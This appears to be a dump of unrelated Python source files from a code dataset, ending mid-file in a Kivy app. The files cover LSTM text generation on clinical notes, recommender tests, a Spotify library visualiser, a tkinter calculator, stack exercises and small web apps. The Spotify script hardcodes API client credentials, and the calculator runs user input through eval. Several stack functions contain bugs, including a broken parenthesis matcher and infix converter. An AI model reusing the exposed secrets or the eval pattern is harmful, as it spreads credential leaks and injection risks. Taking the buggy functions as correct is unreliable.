Wed Feb 6 10:18:34 2019\n\n@author: Rohit\n\"\"\"\n\n# from __future__ import print_function\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.layers import LSTM, Input, Flatten, Bidirectional\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.metrics import categorical_accuracy\nimport numpy as np\nimport random\nimport sys\nimport os\nimport time\nimport codecs\nimport collections\nfrom six.moves import cPickle\nimport nltk\nfrom nltk.corpus import stopwords\n\n\n# =============================================================================\n# preprocessing\n# =============================================================================\n# =============================================================================\n# import re\n# import nltk\n# import pandas as pd\n# nltk.download('stopwords')\n# from nltk.corpus import stopwords\n# =============================================================================\n\n# pre-processing\n# =============================================================================\n# chunksize = 100000\n# chunks = pd.read_csv('NOTEEVENTS.csv', chunksize=chunksize);\n# \n# dfList = []\n# for chunk in chunks:\n# #df_mimic_chunk = chunk # used with smaller set of data\n# #break \n# dfList.append(chunk)\n# \n# # used with larger set of data\n# df = pd.concat(dfList,sort=False)\n# df_mimic_chunk_text = list(df['TEXT'])\n# \n# for index, val in enumerate(df_mimic_chunk_text): \n# stratingString = df_mimic_chunk_text[index].find(\"History of Present Illness:\")\n# endingString = df_mimic_chunk_text[index].find(\"Physical Exam:\")\n# if stratingString == -1 or endingString == -1:\n# df_mimic_chunk_text[index] = \"\"\n# continue\n# df_mimic_chunk_text[index] = re.sub('[^a-zA-Z]', ' ', str(df_mimic_chunk_text[index]))\n# df_mimic_chunk_text[index] = df_mimic_chunk_text[index].lower()\n# df_mimic_chunk_text[index] = df_mimic_chunk_text[index].split()\n# df_mimic_chunk_text[index] = [word for word in df_mimic_chunk_text[index] if not word in set(stopwords.words('english'))]\n# df_mimic_chunk_text[index] = ' '.join(df_mimic_chunk_text[index])\n# \n# with open('/home/chandra/rohit-lstm/lstm-large/data/mimic-data/txt/mimic-data-file.txt', 'w') as filehandle: \n# filehandle.writelines(\"%s\\n\" % data for data in df_mimic_chunk_text)\n# =============================================================================\n\n\n# import spacy, and english model\nimport spacy\nnlp = spacy.load('en')\n\n# setting the parameters\n# data directory containing input.txt\n# =============================================================================\n# data_dir = 'C:\\\\Masters-LUC\\\\spring-2019\\\\research\\\\mimic-iii-project\\\\lstm-large\\\\Next-word-prediction---bidirectional-lstm\\\\data\\\\mimic-data\\\\txt'\n# # directory to store models\n# save_dir = 'C:\\\\Masters-LUC\\\\spring-2019\\\\research\\\\mimic-iii-project\\\\lstm-large\\\\Next-word-prediction---bidirectional-lstm\\\\save'\n# =============================================================================\n\n# pre-processing test file\n# =============================================================================\n# file = 'mimic-data-file-test.txt'\n# with open(data_dir+'/'+ file, 'r') as file_data:\n# file_data = file_data.read()\n# file_data = re.sub('[^a-zA-Z]', ' ', str(file_data))\n# file_data = file_data.lower()\n# file_data = file_data.split()\n# file_data = [word for word in file_data if not word in set(stopwords.words('english'))]\n# file_data = ' '.join(file_data)\n# \n# with open( data_dir + '/mimic-data-file-test-processed.txt', 'w+') as filehandle: \n# filehandle.write(file_data)\n# ============================================================================= \n\n\n# Directory structure for GPU\n# =============================================================================\n# data_dir = '/home/chandra/rohit-git/data/mimic-data/txt'\n# save_dir = '/home/chandra/rohit-git/save'\n# =============================================================================\n\n# Directory structure for AWS EC2\ndata_dir = '/home/ec2-user/rohit/Next-word-prediction---bidirectional-lstm/data/mimic-data/txt'\nsave_dir = '/home/ec2-user/rohit/Next-word-prediction---bidirectional-lstm/save'\n\nseq_length = 30 # sequence length\nsequences_step = 1 #step to create sequences\n\n\nfrom os.path import join\n\n# for gpu\nfile_name = 'mimic-data-file-test-processed.txt'\nvocab_file = join(save_dir, \"words_vocab.pkl\")\n\nnum_words = 0\nwith open(data_dir+'/'+ file_name, 'r') as f:\n# with open(data_dir+'/'+txt, 'r', encoding=\"utf8\") as f:\n for line in f:\n words = line.split()\n num_words += len(words)\nprint(\"Number of words:\")\nprint(num_words)\n\n# =============================================================================\n# document = nlp(u'My name is rohit jagannath. I am a masters degreee holder. I want to get back to stream')\n# print(document)\n# print(type(document))\n# =============================================================================\n\n# read data\ndef create_wordlist(doc):\n wl = []\n for word in doc:\n if word.text not in (\"\\n\",\"\\n\\n\",'\\u2009','\\xa0'):\n wl.append(word.text.lower())\n return wl\n\n#pre-processing\n# =============================================================================\n# punctuation = '!@#$%^&*()_-+={}[]:;\"\\'|<>,.?/~`'\n# print(nlp.Defaults.stop_words)\n# =============================================================================\n\n# create list of sentences\nwordlist = []\ninput_file = os.path.join(data_dir, file_name)\n#read data\nwith codecs.open(input_file, \"r\", encoding=\"utf8\") as f:\n data = f.read()\n#create sentences\ndoc = nlp(data) # using spacy\nwl = create_wordlist(doc) # using spacy\n# wl = nltk.word_tokenize(data) # using NLTK\nwordlist = wordlist + wl \n \n# create dictionary\n \n# count the number of words\nword_counts = collections.Counter(wordlist)\n\n# Mapping from index to word : that's the vocabulary\nvocabulary_inv = [x[0] for x in word_counts.most_common()]\nvocabulary_inv = list(sorted(vocabulary_inv))\n\n# Mapping from word to index\nvocab = {x: i for i, x in enumerate(vocabulary_inv)}\nwords = [x[0] for x in word_counts.most_common()]\n\n#size of the vocabulary\nvocab_size = len(words)\nprint(\"vocab size: \", vocab_size)\nprint(words)\n\n#save the words and vocabulary\nwith open(os.path.join(vocab_file), 'wb') as f:\n cPickle.dump((words, vocab, vocabulary_inv), f)\n \n# create sequences\nsequences = []\nnext_words = []\nfor i in range(0, len(wordlist) - seq_length, sequences_step):\n sequences.append(wordlist[i: i + seq_length])\n next_words.append(wordlist[i + seq_length])\n\nprint('nb sequences:', len(sequences)) \n\n# training\nX = np.zeros((len(sequences), seq_length, vocab_size), dtype=np.bool)\ny = np.zeros((len(sequences), vocab_size), dtype=np.bool)\nfor i, sentence in enumerate(sequences):\n for t, word in enumerate(sentence):\n X[i, t, vocab[word]] = 1\n y[i, vocab[next_words[i]]] = 1\n \n\n# Build Model\n# =============================================================================\ndef bidirectional_lstm_model(seq_length, vocab_size):\n print('Build LSTM model.')\n model = Sequential()\n model.add(Bidirectional(LSTM(rnn_size, activation=\"relu\"),input_shape=(seq_length, vocab_size)))\n model.add(Dropout(0.6))\n model.add(Dense(vocab_size))\n model.add(Activation('softmax'))\n \n optimizer = Adam(lr=learning_rate)\n callbacks=[EarlyStopping(patience=2, monitor='val_loss')]\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=[categorical_accuracy])\n return model\n\nrnn_size = 256 # size of RNN\nbatch_size = 32 # minibatch size\nseq_length = 30 # sequence length\nnum_epochs = 20 # number of epochs\nlearning_rate = 0.001 #learning rate\nsequences_step = 1 #step to create sequences\n\nmd = bidirectional_lstm_model(seq_length, vocab_size)\nmd.summary()\n\n#fit the model\ncallbacks=[EarlyStopping(patience=4, monitor='val_loss'),\n ModelCheckpoint(filepath=save_dir + \"/\" + 'my_model_gen_sentences_lstm.{epoch:02d}-{val_loss:.2f}.hdf5',\\\n monitor='val_loss', verbose=0, mode='auto', period=2)]\nhistory = md.fit(X, y,\n batch_size=batch_size,\n shuffle=True,\n epochs=num_epochs,\n callbacks=callbacks,\n validation_split=0.01)\n\n# save the model\nmd.save(save_dir + \"/\" + 'my_model_gen_sentences_lstm.final.hdf5')\n\n# Generation flow starts here\n\n#load vocabulary\nprint(\"loading vocabulary...\")\nvocab_file = os.path.join(save_dir, \"words_vocab.pkl\")\n\nwith open(os.path.join(save_dir, 'words_vocab.pkl'), 'rb') as f:\n words, vocab, vocabulary_inv = cPickle.load(f)\n\nvocab_size = len(words)\n\nfrom keras.models import load_model\n# load the model\nprint(\"loading model...\")\nmodel = load_model(save_dir + \"/\" + 'my_model_gen_sentences_lstm.final.hdf5')\n\ndef sample(preds, temperature=1.0):\n # helper function to sample an index from a probability array\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)\n\n#initiate sentences\nseed_sentences = u'granulation tissue distal right'\ngenerated = ''\nsentence = []\nfor i in range (seq_length):\n sentence.append(\"revealed\")\n\nseed = seed_sentences.split()\n\nfor i in range(len(seed)):\n sentence[seq_length-i-1]=seed[len(seed)-i-1]\n\ngenerated += ' '.join(sentence)\nprint('Generating text with the following seed: \"' + ' '.join(sentence) + '\"')\n\nprint ()\n\nwords_number = 10\n#generate the text\nfor i in range(words_number):\n #create the vector\n x = np.zeros((1, seq_length, vocab_size))\n for t, word in enumerate(sentence):\n x[0, t, vocab[word]] = 1.\n #print(x.shape)\n\n #calculate next word\n preds = model.predict(x, verbose=0)[0]\n predsList = preds.tolist();\n top5indexes = sorted(range(len(predsList)), key=lambda i: predsList[i], reverse=True)[:5]\n top5words = []\n for i in top5indexes:\n top5words.append(vocabulary_inv[i]);\n # print(top5words)\n \n \n #print(\"Predictions: \", preds)\n #print(\"Sorted Predictions: \", predsList)\n next_index = sample(preds, 0.34)\n print(\"next_index: \", next_index)\n next_word = vocabulary_inv[next_index]\n print(\"next_word: \", next_word)\n\n #add the next word to the text\n generated += \" \" + next_word\n # shift the sentence by one, and and the next word at its end\n sentence = sentence[1:] + [next_word]\n\nprint(generated)\n\n\n\n\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586947962","text":"import pandas as pd\n\nfrom collie_recs.interactions import HDF5InteractionsDataLoader\nfrom collie_recs.metrics import evaluate_in_batches, mapk\n\n\ndef test_implicit_model(implicit_model, train_val_implicit_data):\n train, test = train_val_implicit_data\n\n item_preds = implicit_model.get_item_predictions(user_id=0,\n unseen_items_only=True,\n sort_values=True)\n\n assert isinstance(item_preds, pd.Series)\n assert len(item_preds) > 0\n assert len(item_preds) < len(train)\n\n item_similarities = implicit_model.item_item_similarity(item_id=42)\n assert item_similarities.index[0] == 42\n\n mapk_score = evaluate_in_batches([mapk], test, implicit_model)\n\n # The metrics used for evaluation have been determined through 30\n # trials of training the model and using the mean - 5 * std. dev.\n # as the minimum score the model must achieve to pass the test.\n assert mapk_score > 0.044\n\n\ndef test_other_models_trained_for_one_epoch(other_models_trained_for_one_epoch,\n train_val_implicit_data):\n train, test = train_val_implicit_data\n\n if not isinstance(other_models_trained_for_one_epoch.train_loader, HDF5InteractionsDataLoader):\n item_preds = other_models_trained_for_one_epoch.get_item_predictions(user_id=0,\n unseen_items_only=True,\n sort_values=True)\n\n assert isinstance(item_preds, pd.Series)\n assert len(item_preds) > 0\n assert len(item_preds) < len(train)\n\n item_similarities = other_models_trained_for_one_epoch.item_item_similarity(item_id=42)\n assert item_similarities.index[0] == 42\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68566118","text":"import spotipy.oauth2 as oauth2\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport requests\r\nimport spotipy\r\nimport pickle\r\nfrom skimage import io\r\n\r\ncredentials = oauth2.SpotifyClientCredentials(\r\n client_id='f91e9418e0f142cb9ec5d1058aed4b5b',\r\n client_secret='051c70545d9441e192a8a5e57a7e7558')\r\n\r\nlibrary = []\r\ni = 0\r\n\r\ndata = pd.read_csv('playlist.csv')\r\ndata = data.iloc[:,0]\r\ndata = list(map(lambda x: x.split(\":\")[-1], data)) \r\n\r\nfor id in data:\r\n token = {\"Authorization\" : \"Bearer {}\".format(credentials.get_access_token())}\r\n url = \"https://api.spotify.com/v1/tracks/\" + id\r\n r = requests.get(url, headers=token)\r\n track = []\r\n try:\r\n track.append(r.json()['album']['release_date'][:4])\r\n track.append(r.json()['album']['images'][2]['url'])\r\n track.append(r.json()['album']['name'])\r\n track.append(r.json()['artists'][0]['name'])\r\n track.append(r.json()['name'])\r\n except KeyError:\r\n continue\r\n library.append(track)\r\n i+=1\r\n\r\ndumpfile = open('library.dump','wb')\r\npickle.dump(library,dumpfile)\r\ndumpfile = open(\"library.dump\", 'rb')\r\nlibrary = pickle.load(dumpfile)\r\n\r\nyears = []\r\nalbums = []\r\nal_covers = []\r\nal_years = []\r\nal_artist = []\r\nal_num_track = []\r\nfor track in library:\r\n years.append(int(track[0]))\r\n if track[2] not in albums:\r\n albums.append(track[2])\r\n al_covers.append(track[1])\r\n al_years.append(track[0])\r\n al_artist.append(track[3])\r\n al_num_track.append(1)\r\n elif track[2] in albums:\r\n al_num_track[albums.index(track[2])] += 1\r\n\r\nmax_num = 0\r\nfor curr_year in range(1960, 2020):\r\n num = 0\r\n #print(curr_year)\r\n index = 0\r\n for year in al_years:\r\n if int(year) == curr_year:\r\n #print(albums[index], \"-\", al_artist[index])\r\n image = io.imread(al_covers[index])\r\n plt.imshow(image, extent=[int(year)*10, int(year)*10 + 10, int(num)*10, int(num)*10 + 10])\r\n if int(year) == curr_year:\r\n num += 1\r\n if num > max_num:\r\n max_num = num\r\n index += 1\r\n \r\nplt.tight_layout()\r\nplt.xlim([19600, 20200])\r\nplt.ylim([0, max_num*10])\r\nplt.xticks(range(19600, 20201, 100), range(1960, 2021, 10))\r\nplt.yticks(range(0, max_num*10+1, 50), range(0, max_num+1, 5))\r\nplt.title(\"My Music Library in Album Covers 1960-Present\")\r\nplt.xlabel(\"Year\")\r\nplt.ylabel(\"Number of Albums\")\r\n\r\nplt.savefig(\"library.png\", bbox_inches=\"tight\",transparent=True,facecolor='blanchedalmond', dpi=1100)\r\n","sub_path":"SpotifyLibrary.py","file_name":"SpotifyLibrary.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"273691404","text":"from gusPyCode.MDAP_proj.MDAP_defs import findBestPairAlignments\nfrom TAMO.MotifTools import Motif,load\n\n\niFiles = ['/Users/biggus/Documents/James/Collaborations/Campbell/data/Results_HyperGeoScreen/masked/Results_gGEMS/CCupAt4Days.6-8mers.gGEMS.top6.motifs.stdThresh.tmo']\nmotifs = []\n\nfor i in range(len(iFiles)):\n motifs.extend(load(iFiles[i]))\n\n\n \nmat = findBestPairAlignments(motifs, 1)\n\nNone\n","sub_path":"gusPyCode/MDAP_proj/test_findBestPairAlignments.py","file_name":"test_findBestPairAlignments.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"337765106","text":"from flask import Blueprint\nfrom webapp import signals\n\nbp = Blueprint(\"mod_a\", __name__, template_folder=\"templates\")\n\n@signals.on_app_initialize.connect\ndef initialize(app):\n print(\"init a\")\n app.register_blueprint(bp, url_prefix=\"/a\")\n\n\n@bp.route(\"/\")\ndef index():\n return \"a\"","sub_path":"webapp/modules/mod_a/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"566254653","text":"from tkinter import*\n\"\"\"\nAuthor: F.J\n\nSome terms to define:\npadding = the space between its content and its border.\n\"\"\"\n# display whatever the user clicks on\ndef btnOnClick(numb):\n global operator # operator will hold my expressions for manipulation\n operator = operator + str(numb);\n text_input.set(operator);\n\n# perfom the user's operation and display the result \ndef btnEqual():\n try:\n global operator\n Op_res = str(eval(operator));\n text_input.set(Op_res);\n operator = \"\";\n # if error is generate then handle\n except:\n text_input.set(\"Invalid Operation\")\n# messagebox.showerror(\"An error has occurred\", \"Invalid Operation\")\n operator = \"\";\n\n# clearing everything on sreen\ndef btnClear():\n global operator\n operator = \"\";\n text_input.set(\"\");\n \nUiCal = Tk();\nUiCal.title(\"Demo Calculator\")\n# UiCal.geometry(\"200x300\") # set GUI size in pixel: width x height\noperator = \"\"\ntext_input = StringVar()\n\n# display screen creation (i.e. an entry text)\ntxtDisplay = Entry(UiCal,\n font = ('Comic Sans MS', 20, 'bold'),\n textvariable = text_input,\n bd = 5,\n insertwidth = 4,\n fg = 'blue',\n bg = 'white',\n justify = 'right').grid(columnspan=4);\n\n# creation of buttons\nbtn1 = Button(UiCal,\n padx = 20, # you can also add pady = 16\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '0',\n command = lambda:btnOnClick(0),\n height=1, width=2).grid(row=1, column=0)\n\nbtn2 = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '1',\n command = lambda:btnOnClick(1),\n height=1, width=2).grid(row=1, column=1)\n\ndiv_btn3 = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '/', # or '÷' equally as valid\n command = lambda:btnOnClick(\"/\"), # or '÷' equally as valid\n height=1, width=2).grid(row=1, column=2)\n\nEqbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '=',\n command = btnEqual,\n height=1, width=2).grid(row=1, column=3)\n\nClrbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = 'Cl',\n command = btnClear,\n height=1, width=2).grid(row=2, column=0)\n\nQuitbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = 'Quit',\n command = UiCal.destroy, # use destroy to close GUI\n height=1, width=2).grid(row=2, column=3)\n \n# start the App\nUiCal.mainloop()","sub_path":"Class_demo_calc.py","file_name":"Class_demo_calc.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435125851","text":"'''\nStacks are an ardered collection of items that follow the LIFO prodcuedure.\n\n'''\nclass Stack:\n def __init__(self):\n self.stack = []\n def is_empty(self):\n return self.stack == []\n def push(self,x):\n return self.stack.append(x)\n def peek(self):\n return self.stack[len(self.stack)-1]\n def size(self):\n return len(self.stack)\n def pop(self):\n return self.stack.pop()\n\ndef symbol_checker(symbol_string):\n stack = Stack()\n balanced = True\n index = 0\n while index < len(symbol_string) and balanced:\n symbol =symbol_string[index]\n if symbol == \"(\":\n stack.push(symbol)\n else:\n if stack.is_empty():\n balanced = False\n else:\n stack.pop()\n index = index + 1\n if balanced and stack.is_empty():\n return True\n else:\n return False\n\ndef par_checker(symbol_string):\n stack = Stack()\n balanced = True\n index = 0\n while index < len(symbol_string) and balanced:\n symbol = symbol_string[index]\n if symbol in '({[':\n stack.push(symbol)\n else:\n if stack.is_empty():\n balanced = False\n else:\n top = stack.pop()\n if not matches(top, symbol):\n balanced = False\n index = index + 1\n if balanced and stack.is_empty():\n return True\n else:\n return False\ndef matches(open,close):\n opens = \"{[(\"\n closes = '}])'\n return opens.index(open()) == closes.index(close)\n\ndef binary_conversion(x):\n stack = Stack()\n if x < 0:\n print(\"Please enter an integer greater than 0\")\n while x > 0:\n rem = x%2\n stack.push(rem)\n x = x//2\n\n binary_string = \"\"\n while not stack.is_empty():\n binary_string = binary_string + str(stack.pop())\n\n return binary_string\nprint(binary_conversion(42))\n\n\ndef infix_to_postfix(operation):\n precedence = {}\n precedence['*'] = 3\n precedence['/'] = 3\n precedence['+'] = 2\n precedence[\"-\"] = 2\n precedence['('] = 1\n\n\n op_stack = Stack()\n output = []\n split_operations = operation.split()\n\n for split_operation in split_operations:\n if split_operation in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" or split_operation in \"123456789\":\n output.append(split_operation)\n\n elif split_operation == \"(\":\n op_stack.push(split_operation)\n\n elif split_operation == \")\":\n top_token = op_stack.pop()\n while top_token != \"(\":\n output.append(op_stack.pop())\n top_token = op_stack.pop()\n else:\n while not op_stack.is_empty() and precedence[op_stack.peek()] >= precedence[split_operation]:\n output.append(op_stack.pop())\n op_stack.push(split_operation)\n return \"\".join(output)\n\nprint(infix_to_postfix(\"(A * B + C * D)\"))\n\n\n\n\n","sub_path":"stacks.py","file_name":"stacks.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158115639","text":"# for loop every character, using this char as center to make palindromic \n# longest: maxx\n# when using char as center, two types:\n# 1. even, char in the left side middle(since we circle from left to right)\n# 2. odd, char in the exact middle\n# def check palindromic lenth as a function (center l , center r)\n\n# string \n# maxx = max(maxx,odd,even, key = len) \n# according to the len return string result\n\n# time: O(n)\n# space: O(1)\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n maxx = \"\"\n for i in range(len(s)):\n # odd:\n odd = self.palindromic(i-1,i+1,s)\n # even:\n even = self.palindromic(i,i+1,s)\n maxx = max(maxx,odd,even, key = len) \n # according to the len return string result\n return maxx\n \n def palindromic(self,l,r,s):\n while l>=0 and r\\w{3})/(?P\\d\\d)/$', project.hello),\n url(r'^time/$', project.current_datetime),\n url(r'^time/(\\d{1,2})/$', project.hours_ahead),\n ]\n\nurlpatterns += [\n url(r'^$',book.index),\n url(r'^search-form/$',book.search_form),\n url(r'^contact/$', book.contact),\n ]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^debuginfo/$',project.debug)\n ]","sub_path":"Django2/project1/project1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497713685","text":"\"\"\"\nroot.py is the base container file for the whole app. It contains 2 classes, RootManager and RootApp.\nRootManager extends ScreenManager, and serves as the screen manager for the whole app\nRootApp extends App, and is the base class of the app.\n\"\"\"\nimport datetime\nimport os\n\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty, StringProperty, DictProperty\nfrom kivy.config import Config\nfrom kivy.core.window import Window\n\nimport DatabaseHelper\nimport MainMenu\nimport LoginScreen\nimport PartyForms\nimport GroupForms\nimport FriendList\nimport ProfileForms\n\ndbFileWin = \"AKIAIHS4G2OWPNOX2CTQ_us-east-1.db\"\ndbFileLin = \"AKIAISEQ3C6Z7NODFBBQ_us-east-1.db\"\ndbFileWin10 = \"AKIAJO67AMC5VFHQZBPQ_us-east-1.db\"\nBuilder.load_file('loginscreen.kv')\nBuilder.load_file('mainmenu.kv')\n\n\nclass RootManager(ScreenManager):\n \"\"\"\n RootManager is the screen manager class for the whole app.\n \"\"\"\n curUserDictKivy = DictProperty\n curUserDict = {} # keys = ['uid', 'username']\n friendList = [] # list of 'Friend' objects\n groupList = []\n myGroups = None\n loginScreen = None\n dbFileWin = StringProperty(dbFileWin)\n\n def __init__(self, **kwargs):\n \"\"\"\n This constructor adds all the screens for the app.\n :param kwargs: A dictionary of keyword arguments to be passed to the superclass.\n \"\"\"\n super(RootManager, self).__init__(**kwargs)\n\n # Add all screens for the app\n self.add_widget(LoginScreen.HomeScreen())\n self.add_widget(LoginScreen.LoginScreen(dbFileWin))\n self.add_widget(LoginScreen.SignupScreen(dbFileWin))\n self.add_widget(MainMenu.GroupScreen())\n self.add_widget(MainMenu.PlayNowScreen())\n self.add_widget(ProfileForms.ProfileScreen())\n self.add_widget(PartyForms.InitialForm())\n self.add_widget(PartyForms.StartPartyForm())\n self.add_widget(PartyForms.JoinPartyForm())\n self.add_widget(GroupForms.CreateGroup())\n self.add_widget(GroupForms.BrowseGroups())\n self.add_widget(GroupForms.GroupFilter())\n\n def removeGroup(self, group):\n \"\"\"\n removeGroup() is responsible for removing the given group from the groupList field of this class.\n :param group: an instance of the GroupForms.Group. This represents the group to be removed\n :return: None\n \"\"\"\n print(\"BEGIN RootManager.removeGroup()\")\n index = 0\n groupFound = False\n for tempGroup in self.groupList:\n if tempGroup.groupID == group.groupID:\n groupFound = True\n break\n else:\n index += 1\n if groupFound:\n self.groupList.pop(index)\n else:\n print(\"ERROR: Group Not in RootManager.groupList\")\n print(\"END RootManager.removeGroup()\")\n return\n\n def reloadMyGroups(self):\n \"\"\"\n reloadMyGroups() is responsible for calling MyGroups.reload(). This method is called whenever the groupList\n changes, that is whenever the current user joins a group, leaves a group, is promoted inside a group,\n :return:\n \"\"\"\n if self.myGroups:\n self.myGroups.reload(self.groupList)\n return\n\n def appendGroupList(self, group):\n \"\"\"\n appendGroupList() is responsible for adding groups to the groupList field.\n :param group: An instance of GroupForms.Group\n :return: None\n \"\"\"\n self.groupList.append(group)\n return\n\n def reloadScreens(self):\n \"\"\"\n\n :return:\n \"\"\"\n #self.clear_widgets()\n while self.next():\n screenName = self.previous()\n self.remove_widget(self.get_screen(screenName))\n # self.remove_widget(self.get_screen('homescreen'))\n # self.remove_widget(self.get_screen('creategroup'))\n print(\"Sreen List Length: \" + str(len(self.screens)))\n\n # Add all screens for the app\n self.add_widget(LoginScreen.HomeScreen())\n self.add_widget(LoginScreen.LoginScreen(dbFileWin))\n self.add_widget(LoginScreen.SignupScreen(dbFileWin))\n self.add_widget(MainMenu.GroupScreen())\n self.add_widget(MainMenu.PlayNowScreen())\n self.add_widget(ProfileForms.ProfileScreen())\n self.add_widget(PartyForms.InitialForm())\n self.add_widget(PartyForms.StartPartyForm())\n self.add_widget(PartyForms.JoinPartyForm())\n self.add_widget(GroupForms.CreateGroup())\n self.add_widget(GroupForms.BrowseGroups())\n self.add_widget(GroupForms.GroupFilter())\n return\n\n def logOut(self):\n \"\"\"\n\n :return:\n \"\"\"\n print(\"BEGIN RootManager.logOut()\")\n self.reloadScreens()\n\n self.curUserDict = {} # keys = ['uid', 'username']\n self.friendList = [] # list of 'Friend' objects\n self.groupList = []\n self.myGroups = None\n self.current = 'homescreen'\n print(\"User Logged Out Successfully.\")\n print(\"END RootManager.logOut()\")\n return\n\n\nclass RootApp(App):\n \"\"\"\n RootApp extends App. This is the base class for the whole app.\n \"\"\"\n\n # dbConnection\n @staticmethod\n def initDynamoDB():\n \"\"\"\n initDynamoDB() is used to initialize the Database with all of the tables that the app will use.\n :return: None\n \"\"\"\n print(\"BEGIN RootApp.initDynamoDB()\")\n dynamodb = DatabaseHelper.getDB()\n\n usersTable = dynamodb.create_table(\n TableName='Users',\n AttributeDefinitions=[\n {\n 'AttributeName': 'uid',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'username',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n },\n {\n 'AttributeName': 'username',\n 'KeyType': 'RANGE'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n },\n GlobalSecondaryIndexes=[{\n 'IndexName': 'login_index',\n 'KeySchema': [\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'uid',\n 'login_credentials'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'friends_index',\n 'KeySchema': [\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'friends'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'handles_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'handles',\n 'privacy_settings'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'groups_and_parties_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'members_of_groups',\n 'members_of_parties'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }, {\n 'IndexName': 'games_index',\n 'KeySchema': [\n {\n 'AttributeName': 'uid',\n 'KeyType': 'HASH'\n }\n ],\n 'Projection': {\n 'ProjectionType': 'INCLUDE',\n 'NonKeyAttributes': [\n 'username',\n 'followed_games'\n ]\n },\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n }]\n )\n print(\"Table: %s, Created: %s\" % (usersTable.table_name, usersTable.creation_date_time))\n\n emailTable = dynamodb.create_table(\n TableName='Emails',\n AttributeDefinitions=[\n {\n 'AttributeName': 'email',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'email',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 1\n }\n )\n print(\"Table %s, Created: %s\" % (emailTable.table_name, emailTable.creation_date_time))\n\n usernameTable = dynamodb.create_table(\n TableName='Usernames',\n AttributeDefinitions=[\n {\n 'AttributeName': 'username',\n 'AttributeType': 'S'\n }\n ],\n KeySchema=[\n {\n 'AttributeName': 'username',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 